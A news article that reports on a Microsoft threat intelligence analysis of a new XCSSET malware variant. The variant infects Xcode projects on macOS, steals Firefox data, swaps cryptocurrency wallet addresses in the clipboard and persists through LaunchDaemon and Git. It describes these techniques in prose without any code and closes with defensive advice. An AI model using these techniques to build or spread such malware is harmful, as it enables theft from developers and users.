Cybersecurity researchers have recently identified an updated variant of the notorious XCSSET malware, specifically targeting macOS systems. This new iteration has sparked concern within the cybersecurity community due to its refined techniques and expanded capabilities, particularly concerning browser security, clipboard hijacking, and enhanced mechanisms for persistence.
According to a report released by the Microsoft Threat Intelligence team, the updated XCSSET resembles a sophisticated modular malware that primarily infects Xcode projects used by software developers. Although the exact distribution method remains unclear, it is believed that the malware propagates through shared Xcode project files among developers working on macOS applications.
The latest variant significantly enhances its previous functionality by employing advanced encryption and obfuscation techniques to evade detection. It also utilizes run-only compiled AppleScripts for stealth execution, thereby enhancing its security against cybersecurity measures. Notably, this revision broadens its data extraction capabilities to include sensitive information from the Firefox browser, indicating a strategic pivot in its targeting approach.
A particularly alarming feature of the newfound variant is its integration of a clipper sub-module. This component is designed to monitor the clipboard for specific patterns that align with cryptocurrency wallet addresses. When a match is detected, the malware replaces the legitimate wallet address in the clipboard with an address controlled by the attackers, effectively rerouting transactions and potentially leading to significant financial losses.
The Microsoft report elaborated on further modifications in the malware’s infection chain. Among these, the fourth stage now involves an AppleScript application that executes a shell command to retrieve additional AppleScripts responsible for gathering system information. This implementation adds layers of complexity to its operations.
Additional noteworthy changes include enhanced checks for the Mozilla Firefox browser and a refined logic for detecting the presence of the Telegram messaging app. The latest version also features new modules that replace earlier iterations. For instance, the module previously known as “seizecj” has been rebranded as “vexyeqj,” which efficiently downloads another module named “bnk.” This module is run using AppleScript and incorporates functions for data validation, encryption, decryption, and fetching additional commands from a command-and-control (C2) server, alongside the clipper functionality.
Other modules introduced in this update include “neq_cdyd_ilvcmwx,” which is similar to a previous variant that exfiltrates files to the C2 server, and “xmyyeqjx,” which establishes persistence through LaunchDaemon. Furthermore, the “jey” module facilitates Git-based persistence, while “iewmilh_cdyd” is designed to harvest data from Firefox using a modified version of an openly available tool known as HackBrowserData.
In light of these developments, cybersecurity experts urge macOS users to regularly update their systems and remain vigilant when scrutinizing Xcode projects sourced from repositories or third-party locations. They also recommend exercising caution when copying and pasting sensitive information to prevent potential exploitation by this evolved malware.
